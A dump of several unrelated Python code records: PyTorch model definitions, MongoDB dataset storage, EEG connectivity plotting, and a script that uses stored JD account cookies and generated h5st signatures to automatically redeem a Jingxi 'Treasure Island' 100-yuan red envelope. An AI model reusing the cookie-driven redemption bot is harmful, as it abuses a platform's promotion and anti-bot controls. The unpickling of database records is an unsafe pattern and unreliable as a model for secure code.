self.cnn_max_pool_len[i])))) \n\t\t\t\t\n\t\t\tif self.cnn_use_batchnorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i]))))\n\n\t\t\tif self.cnn_use_batchnorm[i]==False and self.cnn_use_laynorm[i]==False:\n\t\t\t\tx = self.drop[i](self.act[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))\n\n\t\t \n\t\tx = x.view(batch,-1)\n\n\t\treturn x\n\n\n\nclass LSTM(nn.Module):\n\tdef __init__(self,\n\t\t\t\t embed_dim=8,\n\t\t\t\t hidden_size=128,\n\t\t\t\t num_layers=4,\n\t\t\t\t bidirectional=True,\n\t\t\t\t dropout_in=0.25,\n\t\t\t\t dropout_out=0.25):\n\n\t\tsuper(LSTM, self).__init__()\n\n\t\tself.dropout_in = dropout_in\n\t\tself.dropout_out = dropout_out\n\t\tself.bidirectional = bidirectional\n\t\tself.hidden_size = hidden_size\n\t\tself.out_dim = 2 * hidden_size if bidirectional else hidden_size\n\n\t\t\n\t\tdropout_lstm = dropout_out if num_layers > 1 else 0.\n\t\tself.lstm = nn.LSTM(input_size=embed_dim,\n\t\t\t\t\t\t\t\t\t\t\t\thidden_size=hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\tnum_layers=num_layers,\n\t\t\t\t\t\t\t\t\t\t\t\tdropout=dropout_lstm,\n\t\t\t\t\t\t\t\t\t\t\t\tbidirectional=bidirectional)\n\n\tdef forward(self, src_embeddings):\n\t\t\"\"\" Performs a single forward pass through the instantiated encoder sub-network. 
\"\"\"\n\t\t# Embed tokens and apply dropout\n\t\tbatch_size, src_time_steps, embed_dim = src_embeddings.size()\n\t\tsrc_lengths = [src_time_steps] * batch_size\n\t\t_src_embeddings = F.dropout(src_embeddings, p=self.dropout_in, training=self.training)\n\n\t\t# Transpose batch: [batch_size, src_time_steps, num_features] -> [src_time_steps, batch_size, num_features]\n\t\tsrc_embeddings = _src_embeddings.transpose(0, 1)\n\n\t\t# Pack embedded tokens into a PackedSequence\n\t\tpacked_source_embeddings = nn.utils.rnn.pack_padded_sequence(src_embeddings, src_lengths)\n\n\t\t# Pass source input through the recurrent layer(s)\n\t\tpacked_outputs, (final_hidden_states, final_cell_states) = self.lstm(packed_source_embeddings)\n\n\t\t# Unpack LSTM outputs and optionally apply dropout (dropout currently disabled)\n\t\tlstm_output, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs, padding_value=0.)\n\t\tlstm_output = F.dropout(lstm_output, p=self.dropout_out, training=self.training)\n\t\tassert list(lstm_output.size()) == [src_time_steps, batch_size, self.out_dim] # sanity check\n\t\t\n\t\tlstm_output = lstm_output.transpose(0, 1)\n\n\t\treturn lstm_output\n\n\n\ndef make_positions(tensor, padding_idx, left_pad):\n\t\"\"\"Replace non-padding symbols with their position numbers.\n\tPosition numbers begin at padding_idx+1.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\tmax_pos = padding_idx + 1 + tensor.size(1)\n\tif not hasattr(make_positions, 'range_buf'):\n\t\tmake_positions.range_buf = tensor.new()\n\tmake_positions.range_buf = make_positions.range_buf.type_as(tensor)\n\tif make_positions.range_buf.numel() < max_pos:\n\t\ttorch.arange(padding_idx + 1, max_pos, out=make_positions.range_buf)\n\tmask = tensor.ne(padding_idx)\n\tpositions = make_positions.range_buf[:tensor.size(1)].expand_as(tensor)\n\tif left_pad:\n\t\tpositions = positions - mask.size(1) + mask.long().sum(dim=1).unsqueeze(1)\n\treturn tensor.clone().masked_scatter_(mask, positions[mask])\n\nclass LearnedPositionalEmbedding(nn.Embedding):\n\t\"\"\"This module learns positional embeddings up to a fixed maximum size.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\n\tdef __init__(self, num_embeddings, embedding_dim, padding_idx, left_pad):\n\t\tsuper().__init__(num_embeddings, embedding_dim, padding_idx)\n\t\tself.left_pad = left_pad\n\n\tdef forward(self, input, incremental_state=None):\n\t\t\"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n\t\tif incremental_state is not None:\n\t\t\t# positions is the same for every token when decoding a single step\n\t\t\tpositions = input.data.new(1, 1).fill_(self.padding_idx + input.size(1))\n\t\telse:\n\t\t\tpositions = make_positions(input.data, self.padding_idx, self.left_pad)\n\t\treturn super().forward(Variable(positions))\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum number of supported positions.\"\"\"\n\t\treturn self.num_embeddings - self.padding_idx - 1\n\n\nclass SinusoidalPositionalEmbedding(nn.Module):\n\t\"\"\"This module produces sinusoidal positional embeddings of any length.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\n\tdef __init__(self, embedding_dim, padding_idx, left_pad, 
init_size=1024):\n\t\tsuper().__init__()\n\t\tself.embedding_dim = embedding_dim\n\t\tself.padding_idx = padding_idx\n\t\tself.left_pad = left_pad\n\t\tself.register_buffer(\n\t\t\t'weights',\n\t\t\tSinusoidalPositionalEmbedding.get_embedding(\n\t\t\t\tinit_size,\n\t\t\t\tembedding_dim,\n\t\t\t\tpadding_idx,\n\t\t\t),\n\t\t)\n\n\t@staticmethod\n\tdef get_embedding(num_embeddings, embedding_dim, padding_idx=None):\n\t\t\"\"\"Build sinusoidal embeddings.\n\t\tThis matches the implementation in tensor2tensor, but differs slightly\n\t\tfrom the description in Section 3.5 of \"Attention Is All You Need\".\n\t\t\"\"\"\n\t\thalf_dim = embedding_dim // 2\n\t\temb = math.log(10000) / (half_dim - 1)\n\t\temb = torch.exp(torch.arange(half_dim) * -emb)\n\t\temb = torch.arange(num_embeddings).unsqueeze(1) * emb.unsqueeze(0)\n\t\temb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1).view(num_embeddings, -1)\n\t\tif embedding_dim % 2 == 1:\n\t\t\t# zero pad\n\t\t\temb = torch.cat([emb, torch.zeros(num_embeddings, 1)], dim=1)\n\t\tif padding_idx is not None:\n\t\t\temb[padding_idx, :] = 0\n\t\treturn emb\n\n\tdef forward(self, input, incremental_state=None):\n\t\t\"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n\t\t# recompute/expand embeddings if needed\n\t\tbsz, seq_len = input.size()\n\t\tmax_pos = self.padding_idx + 1 + seq_len\n\t\tif max_pos > self.weights.size(0):\n\t\t\tself.weights = SinusoidalPositionalEmbedding.get_embedding(\n\t\t\t\tmax_pos,\n\t\t\t\tself.embedding_dim,\n\t\t\t\tself.padding_idx,\n\t\t\t).type_as(self.weights)\n\t\tweights = Variable(self.weights)\n\n\t\tif incremental_state is not None:\n\t\t\t# positions is the same for every token when decoding a single step\n\t\t\treturn weights[self.padding_idx + seq_len, :].expand(bsz, 1, -1)\n\n\t\tpositions = Variable(make_positions(input.data, self.padding_idx, self.left_pad))\n\t\treturn weights.index_select(0, positions.view(-1)).view(bsz, seq_len, -1)\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum number of supported positions.\"\"\"\n\t\treturn int(1e5) # an arbitrary large number\n\n\nclass LayerNormalization(nn.Module):\n\t\"\"\"Layer normalization for module\"\"\"\n\n\tdef __init__(self, hidden_size, eps=1e-6, affine=True):\n\t\tsuper(LayerNormalization, self).__init__()\n\n\t\tself.affine = affine\n\t\tself.eps = eps\n\t\tif self.affine:\n\t\t\tself.gamma = nn.Parameter(torch.ones(hidden_size))\n\t\t\tself.beta = nn.Parameter(torch.zeros(hidden_size))\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n\ndef PositionalEmbedding(num_embeddings, embedding_dim, padding_idx, left_pad):\n\tm = LearnedPositionalEmbedding(num_embeddings, embedding_dim, padding_idx, left_pad)\n\tm.weight.data.normal_(0, 0.1)\n\treturn m\n\ndef residual(x, y, dropout, training):\n\t\"\"\"Residual connection\"\"\"\n\ty = F.dropout(y, p=dropout, training=training)\n\treturn x + y\n\ndef Linear(in_features, out_features, bias=True, dropout=0):\n\t\"\"\"Weight-normalized Linear layer (input: N x T x C)\"\"\"\n\tm = nn.Linear(in_features, out_features, bias=bias)\n\tm.weight.data.uniform_(-0.1, 0.1)\n\tif bias:\n\t\tm.bias.data.uniform_(-0.1, 0.1)\n\treturn m\n\ndef split_heads(x, num_heads):\n\t\"\"\"split x into multi heads\n\tArgs:\n\t\tx: [batch_size, length, depth]\n\tReturns:\n\t\ty: [[batch_size, length, depth / num_heads] x heads]\n\t\"\"\"\n\tsz = x.size()\n\t# x -> [batch_size, length, heads, depth / 
num_heads]\n\tx = x.view(sz[0], sz[1], num_heads, sz[2] // num_heads)\n\t# [batch_size, length, 1, depth // num_heads] * \n\theads = torch.chunk(x, num_heads, 2)\n\tx = []\n\tfor i in range(num_heads):\n\t\tx.append(torch.squeeze(heads[i], 2))\n\treturn x\n\ndef combine_heads(x):\n\t\"\"\"combine multi heads\n\tArgs:\n\t\tx: [batch_size, length, depth / num_heads] x heads\n\tReturns:\n\t\tx: [batch_size, length, depth]\n\t\"\"\"\n\treturn torch.cat(x, 2)\n\n\ndef dot_product_attention(q, k, v, bias, dropout, to_weights=False):\n\t\"\"\"dot product for query-key-value\n\tArgs:\n\t\tq: query antecedent, [batch, length, depth]\n\t\tk: key antecedent, [batch, length, depth]\n\t\tv: value antecedent, [batch, length, depth]\n\t\tbias: masked matrix\n\t\tdropout: dropout rate\n\t\tto_weights: whether to print weights\n\t\"\"\"\n\t# [batch, length, depth] x [batch, depth, length] -> [batch, length, length]\n\tlogits = torch.bmm(q, k.transpose(1, 2).contiguous())\n\tif bias is not None:\n\t\tlogits += bias\n\tsize = logits.size()\n\tweights = F.softmax(logits.view(size[0] * size[1], size[2]), dim=1)\n\tweights = weights.view(size)\n\tif to_weights:\n\t\treturn torch.bmm(weights, v), weights\n\telse:\n\t\treturn torch.bmm(weights, v)\n\n\nclass FeedForwardNetwork(nn.Module):\n\tdef __init__(self, hidden_size, filter_size, dropout):\n\t\tsuper(FeedForwardNetwork, self).__init__()\n\t\tself.fc1 = Linear(hidden_size, filter_size, bias=False)\n\t\tself.fc2 = Linear(filter_size, hidden_size, bias=False)\n\t\tself.dropout = dropout\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\tx = self.fc2(x)\n\t\treturn x\n\n\nclass MultiheadAttention(nn.Module):\n\t\"\"\"Multi-head attention mechanism\"\"\"\n\tdef __init__(self, \n\t\t\t\t key_depth, value_depth, output_depth,\n\t\t\t\t num_heads, dropout=0.1):\n\t\tsuper(MultiheadAttention, self).__init__()\n\n\t\tself._query = Linear(key_depth, key_depth, bias=False)\n\t\tself._key = Linear(key_depth, key_depth, bias=False)\n\t\tself._value = Linear(value_depth, value_depth, bias=False)\n\t\tself.output_perform = Linear(value_depth, output_depth, bias=False)\n\n\t\tself.num_heads = num_heads\n\t\tself.key_depth_per_head = key_depth // num_heads\n\t\tself.dropout = dropout\n\t\t\n\tdef forward(self, query_antecedent, memory_antecedent, bias, to_weights=False):\n\t\tif memory_antecedent is None:\n\t\t\tmemory_antecedent = query_antecedent\n\t\tq = self._query(query_antecedent)\n\t\tk = self._key(memory_antecedent)\n\t\tv = self._value(memory_antecedent)\n\t\tq *= self.key_depth_per_head ** -0.5\n\t\t\n\t\t# split heads\n\t\tq = split_heads(q, self.num_heads)\n\t\tk = split_heads(k, self.num_heads)\n\t\tv = split_heads(v, self.num_heads)\n\n\t\tx = []\n\t\tavg_attn_scores = None\n\t\tfor i in range(self.num_heads):\n\t\t\tresults = dot_product_attention(q[i], k[i], v[i],\n\t\t\t\t\t\t\t\t\t\t\tbias,\n\t\t\t\t\t\t\t\t\t\t\tself.dropout,\n\t\t\t\t\t\t\t\t\t\t\tto_weights)\n\t\t\tif to_weights:\n\t\t\t\ty, attn_scores = results\n\t\t\t\tif avg_attn_scores is None:\n\t\t\t\t\tavg_attn_scores = attn_scores\n\t\t\t\telse:\n\t\t\t\t\tavg_attn_scores.add_(attn_scores)\n\t\t\telse:\n\t\t\t\ty = results\n\t\t\tx.append(y)\n\t\tx = combine_heads(x)\n\t\tx = self.output_perform(x)\n\t\tif to_weights:\n\t\t\treturn x, avg_attn_scores / self.num_heads\n\t\telse:\n\t\t\treturn x\n\ndef attention_bias_ignore_padding(src_tokens, padding_idx):\n\t\"\"\"Calculate the padding mask based on which embedding are 
zero\n\tArgs:\n\t\tsrc_tokens: [batch_size, length]\n\tReturns:\n\t\tbias: [batch_size, length]\n\t\"\"\"\n\treturn src_tokens.eq(padding_idx).unsqueeze(1)\n\ndef encoder_attention_bias(bias):\n\tbatch_size, _, length = bias.size()\n\treturn bias.expand(batch_size, length, length).float() * -1e9\n\n\nclass TransformerEncoder(nn.Module):\n\t\"\"\"Transformer encoder.\"\"\"\n\tdef __init__(self, embed_dim=256, max_positions=1024, pos=\"learned\",\n\t\t\t\t num_layers=4, num_heads=8,\n\t\t\t\t filter_size=256, hidden_size=256,\n\t\t\t\t dropout=0.1, attention_dropout=0.1, relu_dropout=0.1, cuda=True):\n\t\tsuper(TransformerEncoder, self).__init__()\n\t\tassert pos == \"learned\" or pos == \"timing\" or pos == \"nopos\"\n\n\t\tself.cuda = cuda\n\n\t\tself.dropout = dropout\n\t\tself.attention_dropout = attention_dropout\n\t\tself.relu_dropout = relu_dropout\n\t\tself.pos = pos\n\n\t\tpadding_idx = 0\n\t\tif self.pos == \"learned\":\n\t\t\tself.embed_positions = PositionalEmbedding(max_positions, embed_dim, padding_idx,\n\t\t\t\t\t\t\t\t\t\t\t\t\t left_pad=False)\n\t\tif self.pos == \"timing\":\n\t\t\tself.embed_positions = SinusoidalPositionalEmbedding(embed_dim, padding_idx,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t left_pad=False)\n\n\t\tself.layers = num_layers\n\n\t\tself.self_attention_blocks = nn.ModuleList()\n\t\tself.ffn_blocks = nn.ModuleList()\n\t\tself.norm1_blocks = nn.ModuleList()\n\t\tself.norm2_blocks = nn.ModuleList()\n\t\tfor i in range(num_layers):\n\t\t\tself.self_attention_blocks.append(MultiheadAttention(hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t num_heads))\n\t\t\tself.ffn_blocks.append(FeedForwardNetwork(hidden_size, filter_size, relu_dropout))\n\t\t\tself.norm1_blocks.append(LayerNormalization(hidden_size))\n\t\t\tself.norm2_blocks.append(LayerNormalization(hidden_size))\n\t\tself.out_norm = LayerNormalization(hidden_size)\n\n\tdef forward(self, encoder_input):\n\t\t# embed tokens plus positions\n\t\tbatch_size, src_time_steps, embed_dim = encoder_input.size()\n\t\tsrc_lengths = [src_time_steps] * batch_size\n\t\tsrc_tokens = encoder_input[:, :, 0]\n\t\tpadding_idx = 0\n\t\tinput_to_padding = attention_bias_ignore_padding(src_tokens, padding_idx)\n\t\tencoder_self_attention_bias = encoder_attention_bias(input_to_padding)\n\t\tif self.pos != \"nopos\":\n\t\t\tif self.cuda:\n\t\t\t\tencoder_input += self.embed_positions(src_tokens.type(torch.cuda.LongTensor))\n\t\t\telse:\n\t\t\t\tencoder_input += self.embed_positions(src_tokens.type(torch.LongTensor))\n\n\t\tx = F.dropout(encoder_input, p=self.dropout, training=self.training)\n\t\tfor self_attention, ffn, norm1, norm2 in zip(self.self_attention_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.ffn_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.norm1_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.norm2_blocks):\n\t\t\ty = self_attention(norm1(x), None, encoder_self_attention_bias)\n\t\t\tx = residual(x, y, self.dropout, self.training)\n\t\t\ty = ffn(norm2(x))\n\t\t\tx = residual(x, y, self.dropout, self.training)\n\t\tx = self.out_norm(x)\n\t\treturn x\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum input length supported by the encoder.\"\"\"\n\t\tif self.pos == \"learned\":\n\t\t\treturn self.embed_positions.max_positions()\n\t\telse:\n\t\t\treturn 1024\n\t\t \n\nclass FunTimesCNN(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, CNN_arch, use_sinc_net):\n\t\tsuper(FunTimes, self).__init__()\n\t\tif MLP_before_arch != 
None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\n\t\tif use_sinc_net:\n\t\t\tself.CNN_net = SincNet(CNN_arch)\n\t\telse:\n\t\t\tself.CNN_net = ConvNet(CNN_arch)\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\t\n\tdef forward(self, x):\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\treturn self.result_projection(self.CNN_net(x))\n\nclass FunTimesLSTM(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, lstm_embed_dim, lstm_hidden_size, lstm_num_layers, lstm_bidirectional, lstm_dropout_in, lstm_dropout_out, raw=False):\n\t\tsuper(FunTimesLSTM, self).__init__()\n\n\t\tif MLP_before_arch != None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\t\tself.LSTM = LSTM(lstm_embed_dim, lstm_hidden_size, lstm_num_layers, lstm_bidirectional, lstm_dropout_in, lstm_dropout_out)\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\tself.raw = raw\n\t\t\n\tdef forward(self, x):\n\t\tif self.raw:\n\t\t\tx = x.unsqueeze(-1)\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\tx = self.LSTM(x)\n\t\tx = self.result_projection(x)\n\t\treturn x.squeeze(-1)\n\n\nclass FunTimesTransformer(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, tr_embed_dim, tr_max_positions, tr_pos, tr_num_layers,\n\t\ttr_num_heads, tr_filter_size, tr_hidden_size, tr_dropout, \n\t\ttr_attention_dropout, tr_relu_dropout, cuda):\n\n\t\tsuper(FunTimesTransformer, self).__init__()\n\n\t\tif MLP_before_arch != None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\n\t\tself.transformer = TransformerEncoder(\n\t\t\ttr_embed_dim, tr_max_positions, tr_pos, tr_num_layers,\n\t\t\ttr_num_heads, tr_filter_size, tr_hidden_size, tr_dropout, \n\t\t\ttr_attention_dropout, tr_relu_dropout, cuda)\n\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\t\n\tdef forward(self, x):\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\tx = self.transformer(x)\n\t\tx = self.result_projection(x)\n\t\treturn x.squeeze(-1)\n\n\nclass YeetZ_MLP(nn.Module):\n\tdef __init__(self):\n\t\tsuper(YeetZ_MLP, self).__init__()\n\t\tself.layers = nn.Sequential(\n\t\t\tnn.Linear(60, 10),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Linear(10, 1),\n\t\t\tnn.Softplus()\n\t\t)\n\t\t\n\tdef forward(self, x):\n\t\tx = self.layers(x)\n\t\treturn x.squeeze(-1)\n\nclass EZConv(nn.Module):\n\tdef __init__(self):\n\t\tsuper(EZConv, self).__init__()\n\t\tself.conv = nn.Conv1d(8, 80, 25)\n\t\tself.conv2 = nn.Conv1d(80, 60, 5)\n\t\tself.conv3 = nn.Conv1d(60, 60, 5)\n\t\tself.act = nn.LeakyReLU(0.2)\n\t\tself.mlp = YeetZ_MLP()\n\n\tdef forward(self, x):\n\t\tx = x.transpose(1, 2)\n\t\tx = self.conv(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = self.conv2(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = self.conv3(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = x.transpose(1, 2)\n\t\tx = self.mlp(x)\n\t\treturn x","sub_path":"dnn_models.py","file_name":"dnn_models.py","file_ext":"py","file_size_in_byte":34799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619365289","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*\n'''\n项目名称: JD-Script / jd_jxcfd_100hb\n活动名称: 财富岛-100元红包-兑换\nAuthor: SheYu09\ncron: 0 0,10 * * * jd_jxcfd_100hb.py\nnew Env('京喜 -*- 
财富岛100元红包')\n'''\nimport requests, json, os, sys\nsys.path.append('../repo/SheYu09_jd_scripts_master/')\nimport jdCookie, HEADERS, h5st, posturl\n\ndef ExchangeState(header, name):\n global aNum\n try:\n url = 'https://m.jingxi.com/jxbfd/user/ExchangeState?strZone=jxbfd&dwType=2&_stk=dwType,strZone&sceneval=2&h5st='\n url += h5st.start(url, '10032')\n r = requests.get(url=url, headers=header).text\n data = json.loads(r)\n hongbaopool = data[\"hongbaopool\"]\n hongbao = data[\"hongbao\"]\n for i in hongbao:\n if i[\"strPrizeName\"] == '100元':\n ddwPaperMoney = i['ddwPaperMoney']\n dwLvl = i['dwLvl']\n break\n return hongbaopool, ddwPaperMoney, dwLvl\n except Exception as e:\n if aNum < 5:\n aNum += 1\n return ExchangeState(header, name)\n else:\n aNum = 0\n print(f'========== 【京东账号】{name} 已被Jd拉黑 ==========')\n print()\n return 0, 0, 0\n\ndef ExchangePrize(header, strPoolName, ddwPaperMoney, dwLvl):\n url = f'https://m.jingxi.com/jxbfd/user/ExchangePrize?strZone=jxbfd&dwType=3&dwLvl={dwLvl}&ddwPaperMoney={ddwPaperMoney}&strPoolName={strPoolName}&_stk=ddwPaperMoney,dwLvl,dwType,strPoolName,strZone&sceneval=2&h5st='\n url += h5st.start(url, '10032')\n r = requests.get(url=url, headers=header).text\n data = json.loads(r)\n print(data)\n if data['iRet'] == 0:\n print(f'{data[\"strAwardDetail\"][\"strName\"]}')\n else:\n print(f'{data[\"sErrMsg\"]}')\n print()\n\ndef start():\n print(' ******* 财富岛-100元红包-兑换 *******')\n print()\n cookiesList, pinNameList = jdCookie.start()\n for ckname in jdCookie.Name():\n try:\n ckNum = pinNameList.index(ckname)\n except:\n print(f\"请检查被助力账号【{ckname}】名称是否正确?提示:助力名字可填pt_pin的值、也可以填账号名。\")\n print()\n continue\n print(f\"*******开始【京东账号】{pinNameList[int(ckNum)]} *******\")\n print()\n hongbaopool, ddwPaperMoney, dwLvl = ExchangeState(HEADERS.jd_jxcfd(cookiesList[ckNum]), pinNameList[int(ckNum)])\n if hongbaopool == 0:\n continue\n ExchangePrize(HEADERS.jd_jxcfd(cookiesList[ckNum]), hongbaopool, ddwPaperMoney, dwLvl)\n\naNum = 0\nif __name__ == '__main__':\n start()\n","sub_path":"jd_jxcfd_100hb.py","file_name":"jd_jxcfd_100hb.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21979772","text":"from bson.binary import Binary, USER_DEFINED_SUBTYPE\nimport pickle\nfrom pymongo import MongoClient\n\nfrom database.entities.datasetentities import DatasetImage, DatasetLabel, DatasetEntity\nfrom common.logger import get_logger\n\nmy_logger = get_logger(__name__)\n\nSERVER = \"localhost\"\nDB = \"dataset\"\nCOL_IMG_CLASS = \"classimages\"\nCOL_LABEL = \"labels\"\nCOL_LABEL_NAMES = \"labelnames\"\n\n\nclass DatasetDB(object):\n\n def __init__(self, datasetcollections):\n my_logger.info(\"Starting up Dataset Database.\")\n client = MongoClient(SERVER, 27017)\n db = client[DB]\n self.class_image_collection = db[COL_IMG_CLASS]\n self.label_collection = db[COL_LABEL]\n self.label_names = db[COL_LABEL_NAMES]\n my_logger.info(\"Dataset Database has been initiated.\")\n\n def insert_image_class(self, image_data): # image must be RGB\n my_logger.info(\"Attempting to insert image with image_id \" + str(image_data.get_image_id()))\n image_data = image_data.__dict__\n image_data['image'] = Binary(pickle.dumps(image_data['image']), subtype=USER_DEFINED_SUBTYPE)\n self.class_image_collection.insert_one(image_data)\n my_logger.info(\"Image has been inserted for image_id \" + str(image_data['image_id']))\n\n def insert_label_data(self, label_data):\n my_logger.info(\"Attempting to insert label 
with image_id \" + str(label_data.get_image_id()))\n label_data = label_data.__dict__\n self.label_collection.insert_one(label_data)\n my_logger.info(\"Label has been inserted for image_id \" + str(label_data['image_id']))\n\n def insert_label_names(self, label_name):\n my_logger.info(\"Attempting to insert label name \" + label_name.get_name())\n label_name = label_name.__dict__\n self.label_names.insert_one(label_name)\n my_logger.info(\"Label names has been inserted with name\" + label_name['name'])\n\n def read_image_class_data(self, start_id, end_id):\n my_logger.info(\"Attempting to read image with start_id \" + str(start_id) + \" and end_id \" + str(end_id))\n results = self.class_image_collection.find({\"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n if results is None:\n return None\n dataset = list()\n for data in list(results):\n dataset.append(DatasetImage(data['_id'], data['filename'], pickle.loads(data['image'])))\n my_logger.info(\"Images count found: \" + str(len(dataset)))\n return dataset\n\n def read_label_data(self, start_id, end_id):\n my_logger.info(\"Attempting to label with start_id \" + str(start_id) + \" and end_id \" + str(end_id))\n results = self.label_collection.find({\"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n #results = self.label_collection.find({\"type\": type_of_data, \"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n if results is None:\n return None\n dataset = list()\n for data in list(results):\n dataset.append(DatasetLabel(data['image_id'], data['source'], data['type'], data['label']))\n my_logger.info(\"Labels count found: \" + str(len(dataset)))\n return dataset\n\n def read_image_class_and_label_data(self, start_id, end_id, type_of_data):\n images = self.read_image_class_data(start_id, end_id)\n labels = self.read_label_data(start_id, end_id)\n return DatasetEntity(images, labels)\n","sub_path":"database/datasetdb.py","file_name":"datasetdb.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134700958","text":"import matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nmatplotlib.use('Qt5Agg')\nfrom nilearn import plotting\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nimport helper_functions.process_properties as prop\n\n\ndef plot_connectivity(X_conn):\n regions = ['LF','LC','LP','LO','LT','RF','RC','RP','RO','RT']\n conn_matrix = np.zeros((len(regions), len(regions)))\n coords = np.loadtxt('helper_functions/coordinates.txt')\n\n for t in range(len(X_conn)):\n tmp = X_conn\n conn_tmp = pd.DataFrame(np.zeros((len(regions), len(regions))))\n conn_tmp.columns = regions\n conn_tmp.index = regions\n\n for i in regions:\n for a in regions:\n try:\n conn_tmp.loc[i, a] = tmp[i + '_' + a]\n except:\n conn_tmp.loc[i, a] = tmp[a + '_' + i]\n\n conn_matrix = np.array(conn_tmp)\n\n colormap = matplotlib.cm.get_cmap('OrRd')\n norm = matplotlib.colors.Normalize(vmin=0, vmax=0.3)\n\n fig=plotting.plot_connectome(conn_matrix, node_coords=coords, edge_vmin=0, edge_vmax=0.3,\n edge_cmap=colormap, colorbar=True, edge_threshold=None,\n node_color=colormap(norm(conn_matrix.diagonal())),\n display_mode='lzr')\n return fig\n\ndef plot_pca_results(pdf,X3,Y_out):\n fig = plt.figure(figsize=(6, 6))\n ax = Axes3D(fig)\n n = np.where(Y_out == 0)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 
1)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='orange', label=\"Healthy Control\")\n plt.title('PCA_allPart_wholeBrain_alpha')\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n fig, ax = plt.subplots(1, 3, figsize=(12, 6))\n fig.suptitle('PCA_allPart_wholeBrain_alpha', size=16)\n\n ax[0].set_title('PC 0 and 1')\n n = np.where(Y_out == 0)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='orange', label=\"Healthy Control\")\n\n ax[1].set_title('PC 1 and 2')\n n = np.where(Y_out == 0)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n 